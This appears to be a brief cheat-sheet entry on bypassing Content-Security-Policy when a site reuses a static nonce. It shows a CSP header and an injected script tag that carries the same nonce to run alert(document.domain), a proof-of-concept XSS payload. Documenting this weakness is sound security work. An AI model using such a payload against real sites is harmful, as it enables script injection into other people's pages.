XSS (Static Nonce in CSP)
Content-Security-Policy: ... script-src 'self' 'unsafe-eval' 'nonce-G3cdmbi5XK1gg-JadtzFMw' 'https://<trusted-url>' ...<script>
doSomething();
</script><button onClick="doSomething();">Do It</button><script nonce="nonce-G3cdmbi5XK1gg-JadtzFMw">alert(document.domain);</script>Last updated